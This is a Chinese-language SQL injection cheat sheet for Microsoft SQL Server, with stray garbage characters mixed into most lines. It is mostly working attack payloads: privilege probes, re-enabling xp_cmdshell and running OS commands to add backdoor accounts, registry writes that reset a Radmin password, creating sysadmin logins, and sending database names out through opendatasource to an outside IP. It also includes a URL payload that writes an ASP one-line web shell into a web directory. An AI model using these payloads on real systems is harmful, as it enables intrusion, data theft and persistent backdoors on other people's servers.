//看看是什么权限的
6 K. d% c9 u% s+ t+ {, O' y2 i% Cand 1=(Select IS_MEMBER('db_owner'))
5 C8 g d& Z6 ?: N( }: u; A* `And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--; ~" w: l& N; n4 y% r0 h
; w) r4 `. |% [5 o Y6 f
//检测是否有读取某数据库的权限
+ l/ j9 N4 E6 Zand 1= (Select HAS_DBACCESS('master'))* o. {1 `7 c* E
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --/ H" L$ y1 C/ b6 I3 t
6 {9 b! v1 {& O
7 U/ F' g7 ?" X数字类型( o0 U5 k# F8 R& E# u/ A& U2 K2 S
and char(124)%2Buser%2Bchar(124)=00 R1 U: z( ?1 |. ~
0 B' z2 B3 Q( H) b字符类型: [' f; T/ T3 r4 v' U& p
' and char(124)%2Buser%2Bchar(124)=0 and ''='
0 ^- x3 n0 K5 S* D' C5 s. B* U6 C
$ J% e8 z+ g7 E6 A搜索类型+ p( C4 |4 I: r. H3 l7 P
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
: ~" f* T3 C* l+ s; v
S- W/ x2 I+ ?2 G; F爆用户名
9 e- v3 v8 f6 M" Yand user>0
, @( T- C P# @, X$ p' and user>0 and ''=': O. D: T$ Z* U4 v- N3 m3 q
& A7 j" R4 J$ Z2 p
检测是否为SA权限
+ X% s( R' i3 J! I/ j' i$ O4 land 1=(select IS_SRVROLEMEMBER('sysadmin'));--, _) O4 E3 l% y' }0 s, V
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
' X' n: d5 E; s4 { ~" l, ~7 W! I$ k7 j( N0 o0 M( y
检测是不是MSSQL数据库
7 {8 a! ^6 v" `# T' Q* K. zand exists (select * from sysobjects);--1 x( L# j0 c; Q& J
+ S+ ?, |& k0 @' j" N: u E! s检测是否支持多行- g" K( W, [5 }2 R" x
;declare @d int;--$ V: Z+ G7 b& u+ K2 ?: G
. s8 h5 i: R+ m: m恢复 xp_cmdshell2 s$ D: A( O& a4 D$ }
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--# o: W" o3 v. n. K7 a
1 \3 N$ n/ V z3 S
) v, {2 k2 U5 k5 }# M7 fselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')) H' j* Z6 I" d! ?2 I! k
/ @* h) v) U" X3 ^: j8 {9 J//-----------------------
* a" a- J9 w; K. c1 n* l// 执行命令
# b* H M0 c8 ~* h; o- K//-----------------------
o. K7 u+ n- M* Y+ \6 w# n首先开启沙盘模式:
; V" j6 N6 `/ l; G7 _6 nexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
& s7 L4 @8 \; ?, ?; ^* c
[- q6 m( A7 G* H1 H然后利用jet.oledb执行系统命令* y$ m& G& ?# c/ e7 |8 f2 t
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
' ^0 ^ [0 f+ R7 L t6 K9 q/ d9 i/ h. _& H- w M5 B( \9 l
执行命令
+ |* k, H- N* z, {; G;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
: L2 A$ R K6 h) J7 ^, Z
4 g L' t2 }; V7 i$ sEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
/ M3 g6 g: \$ Y& T0 c
: Y) O/ ?$ z% d7 f' }判断xp_cmdshell扩展存储过程是否存在:& f9 P+ p+ `/ z8 B2 S0 Y
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')" l8 k4 c. q' w' F) [- X
! t8 u0 i. }, Z' s; t
写注册表
`8 i6 b5 K! w+ f3 b/ W; Jexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1; j9 Y0 e' D6 w( U2 ?3 n& n
9 I/ Q( L- R, G5 ], m1 a2 d( @/ l
REG_SZ
0 G, U% C I# q+ k1 v$ |2 a" J' C/ R f: i8 C$ j) W8 Z' ]) [5 [
读注册表
) V/ |/ w8 s3 b4 d# _! uexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
9 @) B: Z- A2 H6 |$ \3 X8 F4 ^8 c' w8 i2 A
读取目录内容
) A; s: L; }$ ?6 ?% L# wexec master..xp_dirtree 'c:\winnt\system32\',1,1
9 B# ^! I. N% L
, A/ ~3 g9 [9 i. F+ j( Q, v! V9 S4 D) }; Z# j+ b7 T
数据库备份0 d; m7 D6 K ^) B. U/ F% H. M! s
backup database pubs to disk = 'c:\123.bak', `& s$ @7 I/ O3 L5 T" w7 N
+ Q7 Y$ }. H" x5 \3 Y( z) i
//爆出长度
3 _0 I' t' {. h, Q8 n( HAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
, b! M. l* o# M, [+ t* i: w
% S& a# m! y# M1 D( e
) M6 l2 I0 |# t. A7 N, J; X: |
. A, K0 c6 ? c5 d/ h. ^0 I/ o更改sa口令方法:用sql综合利用工具连接后,执行命令:
3 n0 p9 [, t7 x5 }2 A1 O& @" L9 `2 dexec sp_password NULL,'新密码','sa'. Q: J1 t( [, \2 C- }) x9 S
" f& I6 ~( k8 H8 q- Y6 i8 G添加和删除一个SA权限的用户test:; p8 X+ {! }0 b
exec master.dbo.sp_addlogin test,9530772" q. i) Y% l+ g" B
exec master.dbo.sp_addsrvrolemember test,sysadmin) X9 }7 z2 `* ?) e1 G3 ^: m: y6 O
1 r, u# Z! M) K% P) H' o删除扩展存储过过程xp_cmdshell的语句:
; x# g# t! T* Hexec sp_dropextendedproc 'xp_cmdshell'7 d" d7 Q1 z6 I/ O
/ c& N, M$ H6 A, A
添加扩展存储过过程
8 }; G6 a/ p& [4 w* lEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
, C3 z, }; ]) v2 ?GRANT exec On xp_proxiedadata TO public
1 W; V7 c/ y7 d5 X
; b7 m/ r9 u# S u; }; i+ R
V# h; |/ f" ^; z停掉或激活某个服务。+ U& p8 O3 V; X9 F" X; s
" \, x% `( q3 _/ F" _1 f9 E" kexec master..xp_servicecontrol 'stop','schedule'# }/ e5 ?, L0 _9 q$ ]
exec master..xp_servicecontrol 'start','schedule'+ @: A( `0 ]6 e: b* [$ k0 n3 U0 g) }
! T, \2 P: j2 L7 e5 o3 Ndbo.xp_subdirs
- K1 @& H& B/ N I+ ~5 N
/ z7 s: [6 |( Z, z/ I2 @' v只列某个目录下的子目录。
& F! B. S+ \( s0 Txp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
" I6 h% p4 N9 [, t+ F- R9 L' N3 K O: I1 r R
dbo.xp_makecab
& s$ M* k0 N* L
$ g+ x' B# S/ B将目标多个档案压缩到某个目标档案之内。; k5 l. A- e3 j2 X* h
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。& t4 p- T( P O
1 r F9 B. I8 E/ ?5 T0 idbo.xp_makecab
" |1 ]+ K& l% P'c:\test.cab','mszip',1,) }/ R# A2 U9 E; m" j# ~+ ^
'C:\Inetpub\wwwroot\SQLInject\login.asp',
$ N% }9 o6 ~, K'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
. p" W( z% B/ E+ K0 e0 t% j
7 y% J, x4 q Oxp_terminate_process
" ]3 ^& S% ], c6 x3 W- S j% ]! z2 W3 L9 Y
停掉某个执行中的程序,但赋予的参数是 Process ID。
2 [0 l" N0 H& L( {4 S( e, C4 y利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID6 e% s @+ J a
) A# O0 Y0 K: l- k, fxp_terminate_process 2484
5 f# X/ C, W9 T; c0 h$ l; N8 m- |, y0 ]: ~
xp_unpackcab% v9 H$ O! M- n& y( b
% G, Z% q% k9 T: B" T, H. P
解开压缩档。
9 {( j" e' T- k# u' b1 o9 j5 s* B- ^( U% N) v
xp_unpackcab 'c:\test.cab','c:\temp',1
8 A- F* l$ _4 H( }0 f
4 [3 b: E( ^- k* q, A) I+ A& F6 Q1 p1 o/ f: b
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
( h4 C5 n) d' u+ H w' r3 `
% X9 h% m* z4 [4 Y$ kcreate database lcx;' Y7 y$ N" f* J) v# G
Create TABLE ku(name nvarchar(256) null);
D6 V1 \3 I" C* ?- hCreate TABLE biao(id int NULL,name nvarchar(256) null);
4 A- o& i# `. T! f/ D
9 r% @: J. B3 z2 f. W" H6 @//得到数据库名! p) e4 t5 y9 s5 e" U
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases! v+ m k; t( u0 }
. N5 K/ o7 `2 d" L3 [5 \/ U- |1 N" \: K. y0 G! Z
//在Master中创建表,看看权限怎样: [% t* @- h1 H7 X0 h/ a
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--; q7 h5 P. b2 N, J d; Z
% B' k$ e6 x! `! Z! @' s7 H用 sp_makewebtask直接在web目录里写入一句话马:# r7 v/ W) C, }: f9 E! [/ a$ ?
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--; m, K, }& _9 e. z$ K! ]4 C
$ M- J( k- i9 |. V' x( j4 b//更新表内容
9 R% O& a! S& k4 d# Y- kUpdate films SET kind = 'Dramatic' Where id = 123: z R. k: |+ t2 w( H
7 D1 Q$ w- t2 {' z0 Q//删除内容/ L/ O) C* t. m8 I
delete from table_name where Stockid = 3 |